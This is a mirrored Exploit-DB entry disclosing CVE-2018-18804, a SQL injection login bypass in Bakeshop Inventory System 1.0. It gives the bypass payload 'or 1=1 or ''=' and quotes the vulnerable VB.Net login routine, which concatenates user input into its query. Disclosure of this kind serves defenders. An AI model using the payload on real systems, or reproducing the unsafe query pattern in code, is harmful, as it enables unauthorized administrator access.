bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45720.txt
Offensive Security 15b77b5965 DB: 2018-10-30 
33 changes to exploits/shellcodes

Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
AlienIP 2.41 - Denial of Service (PoC)
Local Server 1.0.9 - Denial of Service (PoC)
systemd - reexec State Injection
systemd - chown_one() can Dereference Symlinks
ASRock Drivers - Privilege Escalation
Modbus Slave 7.0.0 - Denial of Service (PoC)
School Equipment Monitoring System 1.0 - 'login' SQL Injection
Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)

Paramiko 2.4.1 - Authentication Bypass
Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection
Grapixel New Media 2 - 'pageref' SQL Injection
Library Management System 1.0 - 'frmListBooks' SQL Injection
Open Faculty Evaluation System 7 - 'batch_name' SQL Injection
Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)
MTGAS  MOGG Web Simulator Script - SQL Injection
Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery
Curriculum Evaluation System 1.0 - SQL Injection
Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection
School Event Management System 1.0 - SQL Injection
School Event Management System 1.0 - Arbitrary File Upload
School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)
School Attendance Monitoring System 1.0 - Arbitrary File Upload
School Attendance Monitoring System 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
RhinOS CMS 3.x - Arbitrary File Download
E-Negosyo System 1.0 - SQL Injection
SaltOS Erp Crm 3.1 r8126 - SQL Injection
SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)
SaltOS Erp Crm 3.1 r8126 - Database File Download
K-iwi Framework 1775 - SQL Injection
2018-10-30 05:01:46 +00:00

73 lines
No EOL
2.3 KiB
Text
Raw Blame History

# Exploit Title: Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/bakeshopinventory1.0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18804
# POC:
# 1)
# User: 'or 1=1 or ''='
# Pass: 'or 1=1 or ''='
#
# https://2.bp.blogspot.com/-xjiRUlpkNGc/W9Ywmp79JpI/AAAAAAAAENs/3UDWxFvuTfcJrEKDU9TUxJRpoT8T6yLLwCLcBGAs/s1600/sql4.png
#
#[PATH]/include/publicfunction.vb
#....
#237 Public Sub LoginUser(ByVal userid As Object, ByVal pass As Object)
#238 Try
#239 con.Open()
#240
#241 cmd = New OleDb.OleDbCommand
#242 With cmd
#243 .Connection = con
#244 .CommandText = "SELECT * FROM tblUser WHERE U_UNAME ='" & userid.Text & "' AND U_PASS = '" & pass.Text & "'"
#245 End With
#246
#247 da = New OleDb.OleDbDataAdapter
#248 da.SelectCommand = cmd
#249 dt = New DataTable
#250 da.Fill(dt)
#251
#252 If dt.Rows.Count > 0 Then
#253
#254 If dt.Rows(0).Item("U_TYPE") = "Administrator" Then
#255
#256 MsgBox("You login as administrator!!")
#257
#258 ShowForm(LoginForm1, Form1)
#259
#260
#261 LoginForm1.Hide()
#262 ElseIf dt.Rows(0).Item("U_TYPE") = "Staff" Then
#263
#264 MsgBox("You login as Staff!!")
#265
#266 With Form1
#267 '.ManageUsersToolStripMenuItem.Visible = False
#268
#269 End With
#270
#271 ShowForm(LoginForm1, Form1)
#272
#273
#274 LoginForm1.Hide()
#275 End If
#276
#277 Else
#278 MsgBox("Account does not exists.", MsgBoxStyle.Exclamation)
#279 End If
#280
#281 Catch ex As Exception
#282
#283 MsgBox(ex.Message)
#284 Finally
#285 con.Close()
#286 da.Dispose()
#287 End Try
#288 End Sub
#....
Reference in a new issue View git blame Copy permalink